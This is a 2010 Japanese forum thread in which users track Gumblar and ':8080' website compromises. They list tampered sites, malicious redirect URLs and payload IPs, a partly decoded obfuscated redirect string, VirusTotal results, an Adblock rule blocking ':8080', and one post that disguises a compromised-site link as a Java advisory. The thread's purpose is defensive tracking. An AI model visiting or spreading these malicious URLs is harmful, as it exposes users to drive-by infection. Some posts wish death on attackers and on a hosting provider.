しかも、設定ファイルの置き場所も問題で、会員情報の全員分っぽい大元のCSVファイルと
ロックファイルが、public_htmlの下にまるだしで、URLさえ知ったら誰でもアクセスできる場所に
置いてあるし。いくらなんでも最低レベルだ・・・ザルすぎだろ・・・

俺はアクセスしなかったが、csvは、ちゃんとhtaccessで制限かけてあるんだろうな？
万が一、かけてなかったら・・・いったいどこのテストサイトだよ

ついにＣＳＶファイル直リンURLが来てしまったようですよ

ん、ituneとQuickTimeの更新きてる
一応アップデートしとくか

Appleは29日に88個のパッチが来てる
http://blog.f-secure.jp/archives/50382418.html

88個・・・
狂気だろｗ

>>524
Gumblar/8080
http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/

KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462

この2点でチェックだけでいいよな。>>1テンプレ次は修正すべき。

>>534
それでもこっちよりはマシｗ
ttp://blog.f-secure.jp/archives/50382769.html

http://www.kakiko.com/check/?http://www.happylives.coms.hk/a/yazhouqu/2010/0401/41975.html

>>536
Foxit Reader 3.2.1.0401で対応
警告ダイアログが出るようになった

メッセサンオーもGumblarにやられたのか・・・

関係ないだろ

現在大学4年で就活中なわけだが、最近は企業の事業紹介サイトもガンブラに侵されてたりするから困る
求人サイトからURLを踏む前にチェック入れるのが手間すぎる

>>541
>>2

つーかさあ…ガンブラ撒いてるクズは
さっさと捕まるか殺されるか自殺しとけよ
捕まったら死刑じゃすまねぇからな

はいw

>>543
バカなのはわかったからとっとと>>2読め

個人だったらSecunia Personal Software Inspectorでアップデートすればかんたん
http://www.forest.impress.co.jp/lib/inet/security/antiadspy/secuniapsi.html

【陥落サイトのURL悪用厳禁】
www●mog-mmy●com/
www●ichiryuimono●com/
www●cashingalliance●com ←作りかけ放置？
※コードが途中で切れてるけど、いちおう...
www●tirashi●jp/ ←再掲載(絶賛放置中)
kadaru●mydns●to/tauchi-office/taikensyugi/ ←再掲載(絶賛放置中)
※kadaru●mydns●to/以下が全滅？

【陥落サイトのURL悪用厳禁】
www●babys-b●com/

そういやxreaのユーザー掲示板にwebmaster復活してるんだが
今アドレス送って掲示板に書き込めば403とか対処してくれるかも

>>547
作りかけワロタｗｗｗ
作者めまたやってくれましたな

そういや最近カスペの検出力が落ちてないか？んでトレンドマイクロが上がって来たという
http://www.virustotal.com/jp/analisis/7378e619878ef1a422585f2b00cd59ef7d8508eb1d19713d7f75573344ffbd89-1270127899
http://www.virustotal.com/jp/analisis/26ae4dc8ed13843a5eba0195ad20ebaae717dfbe8e79e7c6664132b0e68079fb-1270129728
http://www.virustotal.com/jp/analisis/7aea9859778fd62be387bf5e2ed5efc3126ae5f7e094461d39956371a7ea4954-1270059628
http://www.virustotal.com/jp/analisis/f67be411f07ae4c9cb814111cd622875b58c607e38d30b373e6d9224a59a7fd9-1270059337
avast 4/4
Kaspersky 0/4
TrendMicro 3/4

>>551
avast使いの人は検体送付してるよ（現に俺がそうだし）
キミがカスペ使いなら以下の検体を送付しる！
http://pc11.2ch.net/test/read.cgi/sec/1258817697/473

ねむい･･･

【陥落サイトのURL悪用厳禁】
www●okjdr●com/
www●oracle-shop●net/

これもっぽいな
www●golazo●jp/

>>554
確認すた>>523だぬ。。。

チェッカーのサイト落ちてる？

>>555
情報ｔｈｘです
最近の傾向についていけてなかったんで自分で見てもわからなかったわ
aguse GWでなぜかyahoo●comのフレームが見えたのがそれのダミーだったんだね

>>557
今の時点（こちらの環境）ではTOPのindexじゃなくて、他のindexが…
例： Last-Modified: Sun, 04 Apr 2010 03:34:43 GMT : 　i/index.html

ｃ７６７ｃ●ｃ２＞２ｗ１＞●６１＞５＿３＞●ｗ１ｗ７＞８ｃ／＿g＿o＿２＞／ｗｉｃｎ６●ｗｐ６ｈ＞ｐｗ’．ｂＺ（／［ｗ￥＞＿６ｃ］／ｇ， ’
↓
７７●２２１●１５３●１７８／ｇｏ２／ｉｎ●ｐｈｐ

>>558
なるほろｔｈｘです
<!-- ad -->になごんだ

しかしこっちもaguse GWだと見た目はyahoocomのフレームだね

GENOウイルス？への誘導レスに注意
http://tsushima.2ch.net/test/read.cgi/news/1270379088/

こんな馬鹿もいるんだねｗ

>>559
jsファイルに弄った跡がなさそうなのとtopのindexにはヤホー米やらなんやらと思ったらaguseでとtopにも>>523出たお。。。

バックナンバーのindexにあるのも確認しました
トップは拾えないなあ

やっとトップわかった！
/mado/か！
>>561さんｔｈｘですた

面白いのがきましたよ〜

【陥落サイトのURL悪用厳禁】
デジタルアソシエーション株式会社
www●digital-as●co●jp/
＼(^o^)／オワタ

> ネットワーク分野においては、ますます重要視されるセキュリティーの問題を含め、
> ネットワークシステムの構築から開発、保守、運用に至るまで確実に進めて参ります。
> 常に、新しい技術を活用するに留まらず、経験あるスペシャリストが業務知識を十分駆使し、
> 課題の本質の調査、分析を徹底的に行うことから、始めます。

digital-as＞める凸完了

こんな会社にシステムだのセキュリティだの語ってほしくないというのがみんなの総意だろうｗｗｗｗｗ

>>566
凸おつ〜

見に行ったら403 Forbiddenだった

>>568
ぐーぐる先生の「きゃっしゅ」にのこってる･･･

>>569
ついにセキュリティ関連企業までやられましたか
やれやれ

>>564
再感染か修正漏れかしらないけれどダメだこりゃ。
www●digital-as●co●jp/service/index●html

>>571
特に何ともないようだが

しかしトップページには何も告知が無い…さすがに出せないか

>>572
/shared/openwin.js
ttp://www.virustotal.com/jp/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270456759

>>573
もう修正されてるお。
Last-Modified: Mon, 05 Apr 2010 11:44:28 GMT

>>572
いま行ったら消えてた。
「人間性を備えた技術集団」を目指すと、改竄は告知なしのこっそり修正になるのか。
胸が熱くなるな。

まだある
Firefoxでwww●digital-as●co●jp/service/index●html
ソースの14行目の/shared/openwin.jsをクリック
ページをコピペしてvirustotalに投げてみそ

>>576
http://www.kakiko.com/check/test.cgi?http%3A%2F%2Fwww%2Edigital%2Das%2Eco%2Ejp%2Fshared%2Fopenwin%2Ejs
http://rd.or.tp/get.php?site=http%3A%2F%2Fwww%2Edigital%2Das%2Eco%2Ejp%2Fshared%2Fopenwin%2Ejs&act=view
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fshared%2Fopenwin.js

キャッシュじゃにゃいのか？

http://online.us.drweb.com/result/?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fshared%2Fopenwin.js
>>573の修正後なぬで緑

>>577のVTの結果

誰かが投げたの
http://www.virustotal.com/analisis/18f5d41467bfe3e00870d1e668df8f5fadec3bc0b041c8c97c1d78c14d39ae15-1270477188
File openwin.js received on 2010.04.05 14:19:48 (UTC)
Result: 0/39 (0.00%)

今、漏れが投げたの
http://www.virustotal.com/analisis/18f5d41467bfe3e00870d1e668df8f5fadec3bc0b041c8c97c1d78c14d39ae15-1270480147
File openwin.js received on 2010.04.05 15:09:07 (UTC)
Result: 0/39 (0%)

>>573はヒゲおじさんから次のうｐだてで「Trojan.JS.Redirector.bt」だおって返事きてた。
かすぺユーザーは確認よろ。（VTは更新が遅いから）

>>577
別PCで見たらなかったにゃ

>>579
ﾉｼ

時間も経ってるしとりあえず投げてみた。
http://www.virustotal.com/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270483429
File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
Result: 5/39 (12.82%)

まだ、更新されてないのね。

>>580
× File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
○ File www.digital-as.co.jp.openwin.js received on 2010.04.05 16:03:49 (UTC)

念のため
http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270455682
File www.digital-as.co.jp.index.html received on 2010.04.05 08:21:22 (UTC)
Result: 7/39 (17.95%)
↓
http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270483925
File www.digital-as.co.jp.index.html received on 2010.04.05 16:12:05 (UTC)
Result: 7/39 (17.95%)

相変わらずavastは頑張ってますな
ありがたやありがたや

digital-as●co●jp中の人がスレに常駐してたっぽいなｗ
こんなところを見てる暇があったら「告知(お詫び)」書け。

■サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
ttp://www.so-net.ne.jp/security/news/library/2112.html
>改ざんされたサイトを閲覧し、不幸にもウイルスに感染してしまった人たちは、
あなた方が知らせなければ、今も感染に気付かないままでいる可能性が高いのだ。
>Webサイトの管理者や運営者の方たちは、できるだけ迅速に改ざんされていた期間と場所を告知し、
この負の連鎖を断ち切れるよう尽力いただきたい。

■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
報告もしろよ＞digital-asの糞シス管

>>584
>>566さんとは別に漏れもめるぽした時にセキュリティ通信のそのアドレスも含めて送ったお。
toで同時に送ったCPIからは返事きてた。
JPCERT/CCにはccで同時に送ったお。

デジタルアソシエーション 株式会社 にはせめてIPAに自社のホームページが改竄を受けてトロイをばら撒いていたことを自己申告してほしい。


　　　γ⌒ヽ
　　＜　・､,,,;;,）　　　　　　ﾊ,,..,,ﾊ
　 ＜　つ＝つ　　　　　/;;・ω・;;ヽ
　 ノ　　 ﾉ三）　　　　　(;(　^^^　);)
∠、　m）＝m） 　 　 　 `'ｰ---‐´


いかんな、もう修正されたしいい加減スルーするとこだけど>>565だからなぁ…

>>585
【主な取引先】
NECシステムテクノロジー株式会社
株式会社NTTデータアウラ
株式会社NTTデータ関西
株式会社大阪第一食糧
京セラ　コミュニケーションシステム株式会社
スミセイ情報システム株式会社
住友化学システムサービス株式会社
デジタルプロセス株式会社
ニッセイ情報テクノロジー株式会社
日本電話施設株式会社
パナソニックAVCマルチメディアソフト株式会社
株式会社日立システムアンドサービス
株式会社富士通九州システムズ
富士通テン株式会社
富士電機ＩＴセンター株式会社
三井情報株式会社
安川情報システム株式会社

日本アイ・ビー・エム株式会社
みずほ銀行
三井住友銀行
りそな銀行


上記の企業を相手に商売してて「逃げ(告知無し)」がバレたら
倒産フラグ成立間違いなしだろうなｗ

>>586
( ﾟ∀ﾟ)ｱﾊﾊ八八ﾉヽﾉヽﾉヽﾉ ＼ / ＼/ ＼

http://www.nca.gr.jp/member/index.html
ここの会員でJPCERT/CCから情報の共有があって、関連会社との連携が深ければ ぁぅぁぅ

>>586
どうせ特定派遣で人材出してるだけだろうから
派遣されてるヤツが派遣先で問題起こしたとかじゃなければあんまり影響ないよ。
取引先のWebサイトとかを制作してたとか、
顧客のPCをGumbler攻撃で感染させちゃったとかなら契約切られる可能性もあるが…

銀行系にはそんなずさんな企業と取引があることが
信用不安になるからそれなりに効果ありそうだけどね。

釈明報も掲示しないで隠蔽しようとする会社って…

銀行は単に融資を受けてるだけじゃねw
融資銀行だって取引先に書くだろうし、この程度で信用不安になるなら
もっとマスコミが騒ぎ立てるだろ…

【陥落サイトのURL悪用厳禁】
中途半端なコード撤去、再改竄、絶賛放置中とか･･･
posh-e●com/index10●htm
pacific-staff●net/
hoikuen●19th●org/
cre2cash●2pg●in/ ←朝日オート(sunrise●2pg●in/)と同じく<!--<script>-->

>>592
コメントアウトとかアホな対応してるな…

> <!--<script>-->
これって一応、無効化してるんだ

>>592
醤油みてる最中だけど新型？
＞ hoikuen●19th●org/
bestdarkstar●info:8080

自己レス
91.121.117.37
gnomeさんとこで確認すた。。。

94.23.159.128になった。
これもgnomeさんとこで確認

>>592
あーーっ！
> hoikuen●19th●org/

http://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php

.info 浸食

</script><noscript><div style="position:absolute;">
<img width=1 height=1 alt="" src="http://b3.yahoo.co.jp/b?P=
FBGG7XxTw7GuMbELS3k.QhJAeWYvBUu7D_gAAyR9&T=13vm0jrtv%2fX%3d1270
550520%2fE%3d2079744651%2fR%3djp_r25%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY
%3djp%2fF%3d3785814215%2fQ%3d-1%2fS%3d1%2fJ%3d52C3537C"></div></no
script>
これは?

>>595
かぶった

>>597
いまはこの5個セット
195.160.200.36 GB:AS44949 (GIGACODES)
77.241.93.114 BE:AS34762 (COMBELL)
91.121.117.37 FR:AS16276 (OVH)
91.121.169.6 FR:AS16276 (OVH)
94.23.159.128 FR:AS16276 (OVH)

OVH死ねよ

>>599

ビーコン用GIFかな

>>592
sunrise●2pg●inも変わってる
-> snoreflash●ru:8080

2pg●in消えたっぽい？
>>602ソースアーカイブでけんかった。。。orz....

>>595-603
天然で新型を引っ張ってたみたいだぬ（苦笑）

>>598
.ruドメイン管理厳格化の影響だな
次は.infoか…

>>564-591
【お詫び】ホームページ改ざん被害について
Last-Modified: Tue, 06 Apr 2010 12:53:17 GMT ttp://www.digital-as.co.jp/newstopics/2010/04/post-8.html

>>606
これ、説明として正しいのか？
自分とこの管理用PCが感染して、それでサイト更新しただけだろ？

本当に管理用PCだけが感染してたかはわからんしな
他にもあるんじゃなかろうか

まあでも一応不正アクセスではあるんじゃね
広義では、管理者の意図しないアクセス＝不正アクセスらしいからな

やはりOS再インストールしろとは書かないのね…

書けないでしょね。。。



>>573-582あたりの続き

http://www.virustotal.com/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270563397
File www.digital-as.co.jp.openwin.js received on 2010.04.06 14:16:37 (UTC)
Result: 7/38 (18.43%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
GData 19 2010.04.06 JS:Illredir-AL
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AB
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB

http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270563154
File www.digital-as.co.jp.index.html received on 2010.04.06 14:12:34 (UTC)
Result: 11/39 (28.21%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
BitDefender 7.2 2010.04.06 Trojan.JS.Clicker.ABW
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.06 Trojan.JS.Clicker.ABW
GData 19 2010.04.06 Trojan.JS.Clicker.ABW
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AA
nProtect 2009.1.8.0 2010.04.06 Trojan.Script.397566
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB

んで>>595-603あたりでやった分

http://www.virustotal.com/analisis/9afe33fa08cea6979affa902512999d9df95078a07290cdef0aeda02b9b7370e-1270556815
File hoikuen.19th.org.html received on 2010.04.06 12:26:55 (UTC)
Result: 2/39 (5.13%)
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
NOD32 5003 2010.04.06 JS/TrojanDownloader.Pegel.AA

ソースだけにしたブツ
http://www.virustotal.com/analisis/5f943b2b2e48467b0a934a6eb5eac41319ed71c9fe3a5b71346cabfe2446dc1f-1270557088
File 19th.org.txt received on 2010.04.06 12:31:28 (UTC)
Result: 0/39 (0%)

>>610
avast以外のフリー系には期待出来んな

>>612
得手不得手があるよ
Gumblar.xだとAVGがよかったりする。
>>611はほぼ全滅なぬで国ドメイン（IPアドレス）変えただけでも脅威になるのね。。。
個人的にイパーイ検体出してるけどユーザーじゃないから届いてないかもしれにゃい。。。orz.....

>>613
メールなら関係ないと思う
俺はユーザーだけどメールで検体出してるし、2回ほど返事が来たこともある
まぁavastはめったに返事来ないがな

>>606
>2. 不正アクセスにより改ざんされた対象期間
2010年3月25日(木)6：00　〜　2010年4月5日(月)23：00

>>564 ：コテハン ◆8080adndqg ：2010/04 /05(月) 14:34:45
ここに投下されて凸られるまで「気づかなかった」としたら最悪だなwww

>>614
AVGはツンデレ（死語）でねぇ、一度も返事がなかったんだけど
解パス間違えて送ったら、パス合わねぇーって返事北。
同時に出したかすぺはパス解読して対応の返事北。ｗ

>>615
注意：醤油に反応する場合があります。
Last-Modified: Thu, 01 Apr 2010 13:17:22 GMT : ttp://megalodon.jp/2010-0405-1616-22/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fcompany%2Findex.html
多分気づかなかったんですね

>>616
1回は検体提出感謝の返事がスペルミス付きで来たｗ
1回は添付忘れて送ったら、4日後に「添付がねぇ」ってサポートからメール来た

>>617
みんなやっちゃうなぁｗ

ここんとこパス合ってるけど圧縮ファイル名間違えて送ること数回。
顰蹙買い捲ってそうです＞＜

>>615
期間長っ！　終わってるな・・・

>>612
スクリプトが検知できないから期待できないと言うのは早漏だろ。
スクリプトを踏んだ時点で検知できればそれに越したことはないが
肝心なのは現物がDLされる前に検知できるかであって
検知できれば結果は同じことだ。


その現物を持っていないから検知できるか知らんけどね。

bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか？
>>2はやってるはず。adobe readerは半年以上前にアンインストールしてある

重複してるのはぢめて見た･･･

【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/ ←絶賛放置中
↓
hXXp://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php
コードは>>598と同じなんだけど･･･
<!--562ba23ffcf28efa4f71fc787258d3d3-->
<!--e62178df1fa90a28d1b2efa8443ab220-->
謎の文字列が謎...

はずじゃなんとも言えませんなあ
心配ならOS入れなおし推奨

このスレで質問しても無駄だぜ
「感染してるかもと思ったんならクリーンインストールしろ！」で終わりだから

実際それが一番確実だろうしな

info:8080の拡散が始まった？
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.jc-consulting.jp%2F&x=23&y=13

at:8080
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fnetnavi.boo.jp%2Fleopalace%2Flink%2F&x=55&y=12

やばいねー

引き続き*:8080/をブロックでおｋかな？

【陥落サイトのURL悪用厳禁】
www●toutyann●com/
↓
hXXp://snoreflash●ru:8080/360-cn/google●com/thesun●co●uk●php

また重複しとる...

>>626
いいんじゃね。
8080全弾きは誤爆するという奴もいるけど、そんな事例見たことないし。

>>625
hXXp://helphomecare●at:8080/ultimate-guitar-com/google●com/livedoor●biz●php
at:8080/もでつか･･･ orz

>>626 *:8080/* ブロックでおｋ。
巻き込みで阻止られるサイトはURLが悪い（笑）

仮に :8080/ がアドレスに含まれる真っ当なサイトがあったとしても、そのときは一時的に
ブロックを解除すればいいだけだしな。

http://rd.or.tp/get.php?site=http%3A%2F%2Fwww.jde-net.co.jp%2F&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none

http://rd.or.tp/get.php?site=http%3A%2F%2Fwww.chanwoomul.net%2FNicecart4plus%2FShop%2FMember%2Fjoin_agree.html+&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none

> Found iFrame!
誤検出かな？

>>631
上: 269, 270
下: 1053, 1054

にそれぞれ<iframe></iframe>があるぜぃ

Avira10premium使ってみたがwebリダイレクトは問答無用でブロック。
offにするにはwebGuardを無効にするしかない。i-frameに対する設定は出来る。
なんでもクリックするヤツには良いかもしれん。

>>631
jde-net●co●jp センセイの診断結果
>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。

センセイ激怒中ｗ

>>633
なんでもかんでもクリッコするやつは
パソコンを使わない方がいいと思うｗ

ABP 1.1.3ですけど

|http://*:8080*

でおｋ？

>>650
ttp://www.aguse.jp/?m=w&url=www.footsal-club.net&x=30&y=19
ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.unique-gifts-ideas.com%2Fcontact_us.html&x=39&y=16

阿斗ちゃん増殖中…

http://rd.or.tp/get.php?site=ayaka.echoll.net&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none
ここ出てたかな

ごめんミス
>>625でした・・・

新コードに絶賛更新中
【陥落サイトのURL悪用厳禁】
fleur●webinfo●jp → loadtube●ru:
dog-g-club●com → helphomecare●at:
f39●aaa●livedoor●jp/~miyui/archives/cat3/cat10/index●html → helphomecare●at:
miyagi●007champagne●biz/asobo → youhelpnow●ru:
dxenglish●value-net●net/index●html → bestdarkstar●info:
--
発掘中にみつけた8080じゃないやつ
www●bestofunder●com/ ←アクセス注意

8080ではなく懐かしのGumblar.xちゃん
moebox●com/main●html

たぶんもっと前から改ざんされてたとおもうけど一応貼っとく
Last-Modified: Sun, 04 Apr 2010 23:20:30 GMT

でもドメインが新しいのかこれ
.irってイランか
初めて見たわ

>>639追記
aguseのソースをまとめてDLしてくれるの便利だね
/js/table.js や /js/lk.js にてんこ盛りされてて吹いた

ずっと修正されないまま更新され続けてるっぽいなあ
同じURLが連続してるとこから手動ではなく自動っぽいことが伺える
まあLast-Modified: も近い時間になってるしね

>>638
注意のURLを踏んでしまったOTZ
とあるインドの”コンピューターの危険にさらされる”サイトに飛ばされた

ちょうしこいて踏むんじゃなかったぉ・・・

www●bestofunder●com/
↓2ヶ所に飛ばされる
zeneey●com/email/znystyle.phpとzeneey●com/は踏んでしまったOTZ
nt01●co●in/3　はセクルチーが防いで踏まずに済んだみたい…

zeneey●com/は感染サイトだから、今月中にOSの再インストールするぉ！

>>622
> <!--562ba23ffcf28efa4f71fc787258d3d3-->
> <!--e62178df1fa90a28d1b2efa8443ab220-->
> 謎の文字列が謎...

この文字列が有る無しでもセキュリティベンダーによっては検出しない場合があるね。
つか、avast!対応早杉、頑張り過ぎだろｗ

http://www.virustotal.com/jp/analisis/073b35436e7d1826fffeddb9ba86dbbda88b31ff0f313434cc192ab448b0598b-1270798114
http://www.virustotal.com/jp/analisis/576625dfc92ddec9c083a0be35955bcbbb2ccc00e8fa10529593b1d9fd66fa45-1270798218
http://www.virustotal.com/jp/analisis/64e5f4361d53c04a3507ccd0f5fa26f825334712f067cb1ca13a0752d5004cf6-1270798308
http://www.virustotal.com/jp/analisis/196b6cc52572a0df14fa9464d23791ae672ff96a7d193d232e4391d290b6a030-1270798380
http://www.virustotal.com/jp/analisis/bf1442e8539eff69b8cc1030558336386fe37ced27486f4781d1ac13cfb99606-1270798440
http://www.virustotal.com/jp/analisis/a8b209ae2b1c3763d0a2c594f707dc508e37321bd243b9e6651c541ca97d84c1-1270798557
http://www.virustotal.com/jp/analisis/c8cdcb6c4c477d5003838dfebc02a83c5988514cc043069d8358b5b5dee17dbc-1270798655
http://www.virustotal.com/jp/analisis/5a293d97eb69fc9b774679863c8702048de6d6f3b5fc701ae81b3309181fde3b-1270798725
http://www.virustotal.com/jp/analisis/aef4d81b737da5ed04e1baf7055584392e6e5bb9cbcda7003feb6463199e5c32-1270798795
http://www.virustotal.com/jp/analisis/ea69840abf9a2e9d0614bfae8968951493ad27439900fb4d4742422d069d5abb-1270798870
http://www.virustotal.com/jp/analisis/f972bd8e899ff3faf7d96441af889eb3382705badca99ebe6b96b2405b5102b7-1270799054
http://www.virustotal.com/jp/analisis/2368c9df63ed57807419bc6bd8549a8a4c8d5d7da87a0e823f30a7406da595df-1270799145
http://www.virustotal.com/jp/analisis/7688fcc5d7ff528a345f2fed476550887b3d979791431436a861b585c5ed91c9-1270799251
http://www.virustotal.com/jp/analisis/a5dce97142a62462733d934cb253aea387371ce9356f7b6a14ac135b72ca7ce8-1270799355

きゅ〜い！きゅ〜い！（ｷﾘｯ

【陥落サイトのURL悪用厳禁】
www●ferahdondurma●com ← アクセス注意！
※改竄されすぎててよくわからんｗ

neta-script●lionking●jp/ (.at:8080/)
8080系のスクリプトが最大の仕込み？


携帯オンリーで掘るのは厳しいゾ･･･とｗ

ところでなんでVTのスキャンに使われているカスペってバージョン古いんだ？
VTのスキャン結果でカスペがスルーして「ウイルス検出できない！カスペオワタ！」
って言われるのはカスペ信者としては見過ごせないのだが。

面倒くさいからじゃないか？ｗ

>>647
だれうまｗ

www●e-tokunaga●co●jp/contents/house_dock/index●html
www●vericapandilovska●com●mk/
this●is/ausgot/
at:8080

capvex●com
egujarat●net
info:8080

reagold●com
カスペに蹴られた…ウイルスか？

>>650
>reagold●com
色々仕込んであるというか･･･元のページの面影が無いｗ

・<!-- ad -->
・Gumblarっぽいやつ
・var I={j･･･
・var Il1I1111I1=function

www●e-tokunaga●co●jp/pc/free06●html

動画って見るのめんどいよなあ
LACCOTV: 「Gumblarの脅威！新たな危険挙動を追跡中！」
http://www.youtube.com/user/laccotv#p/u/0/R1t4QPIRzsg

>>621
> bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか？

JREのアップデート通知でしょ。
Java 新版登場。27 種類の欠陥が修正されている。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/04.html#20100401_Oracle

Javaの実行プログラムが呼ばれてタスクトレイにでてきたんじゃないの

すみません教えてください
見たいサイトがあってグーグルのキャッシュというところをおして見ようとしたら
avastに警告され、キャッシュのURLを入れてチェッカーに掛けたら
外部へリダイレクトされていますと赤字で出ましたが
マルウェアが検出されないと出ます。
これってウイルスサイトではないってことですか？

見たかったサイトはur-chintai.infoというところです。

>>657
仮想マシン一台作って見にいってみたけど
403エラーで何も見れません。
心配なら、OSの再インストールを勧めます。

ur-chintai.infoは以前ガンブラーに感染してたんだよ
今はアクセスできない
キャッシュは感染してる

すいません、ガンブラーって手動削除可能でしょうか？
なんかウィルスバスター起動しなくて、、、

www●geocities●jp/owari_ka_ra/
www●geocities●jp/o_tweb/
www●geocities●jp/shimilw/

>www●geocities●jp/owari_ka_ra/
懐かしのCODE1

>>658
>>659
ありがとうございました。感染してたur-chintai.●infoはなくなったのに
キャッシュで感染するんですね・・・
ａｖａｓｔでＨＤＤ検査して一応ウイルスなかったのですが
カスペでもやって見つかったら再インストールします・・・

>>663
avastが防いでくれたから問題ないだろ

www●kyoudoumusen●jp

freett●com/takarafune
www●tirashi●jp/　ここも全然対処しない

ss-gaido●info

ふりちけは存在自体がウイルス（広告的な意味で）

avastスレより
partsdepot●jp/

チキンな私のかわりにどなたかよろしく。。
www●gozaisho.co●jp

右下に「やんちゃ爆弾」てのが出ていて、難読化されています。
ググってみたら、やんちゃ爆弾自体はブログパーツのようなんですが、
ロープウェイの公式サイトにこんなオモチャを仕掛けるって、普通の企業なら
あり得ないと思うのですが。
そもそも、難読化する必要性がないですよね。他の部分は普通に読める
アドレスで貼ってあるのに、ｏｐｅｎの部分のみ。

既存のものを利用した新たな改竄ってことはないですか？
それともこれが普通の形態？

考えてみたら、ブログパーツ部分に仕掛けられたら、危険性認識せずに
押してしまう人はたくさんいそうだ。。

>>670
解読結果

　 　　　*　　　　　　*
　　＊　　うそです　　　＋　　
　 　　 n ∧＿∧　n
　＋　(ﾖ（* ´∀｀）E)
　 　 　 Y 　　　 Y　　　　＊

ｗｗｗｗｗｗ

>>660
無理
セキュリティソフトが起動しない時点でいろいろやられてるってことです
OS入れなおしましょう

>>663
キャッシュなら安全とおもうほうがおかしいよ
単純に考えてコードをそのまま保存するんだから攻撃スクリプトも保存されるでしょ

1994年生まれの人集まれ！★3
http://gimpo.2ch.net/test/read.cgi/nendai/1269784099/

>>674
マルチ死ね

やっぱavast入れとくか

何使おうがやるべき事やっていれれば今のところは感染のしようもないけどな。

>>2の対策だけで心配なら以下の変更もやっておく可
Internet Explorer で ActiveX コントロールの動作を停止する方法
http://support.microsoft.com/kb/240797
Java Runtime Environment
http://this.is/ausgot/?id=forum/serious-new-java-flaw-affects-all-browsers-040910

下のURLあやしすぎわろた

>>678
俺の貼った陥落サイトのURL使ってんじゃねーよクソが
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fthis.is%2Fausgot%2F%3Fid%3Dforum%2Fserious-new-java-flaw-affects-all-browsers-040910+&x=55&y=13

>>680
管理者氏名がパッと見Gumblarに見えたｗｗｗ

>>670
ここは鑑定スレではありませぬ。

>>678
下段のURLは8080系の陥落サイト。
easyfunguide●at:8080/

「陥落サイトが増える(かもしれない)」から
遊びで貼るのはやめましょう。

http://www.avast.com/virus-monitor
JS:Illredir-AQ(＝8080)の増え方が激しい…本日の検出数は上から5番目
盛大に拡散中ですなｗｗｗ

ここで話していいかわからんけどgredのURL入力欄で http://　ってのいらなくね？
消すのメンドイ

【陥落サイトのURL悪用厳禁】
jyo●eisuku●com/home/
adgaw●com/lovesheet/index●html
www●borneomarathon●com/jpn/home●html ←旧型

けんさくわーど："new String();" "new Date();" "new Array();" -JAVA -JAVAScript
site:jp の検索結果 約 160 件
site:cn の検索結果 約 490 件
site:ru の検索結果 約 1,860 件 ←ｗｗｗ

お前らなんでこんな詳細にウイルス分析してんだよｗｗ
セキュリティベンダーに就職しろｗｗｗ

www■tirashi■jp/
トップはメンテ中になってるが他のページがネット上に残ったまま
www■tirashi■jp/tmp/flyer_zooma/ZcyyxafVGp_129/

www■niaufuku■com/sense_up/index■htm
書き込みに失敗しているところが掛ったと思ったら
www■niaufuku■com/index■htm
他のページは成功してるらしい。

bag■fukunekodo■com/mindex/　携帯向けのサイト
と思ったらfukunekodo■com/　上にあるサイトが全部やられてるっぽい

wagashi■fukunekodo■com/index/
shochu■fukunekodo■com/index/
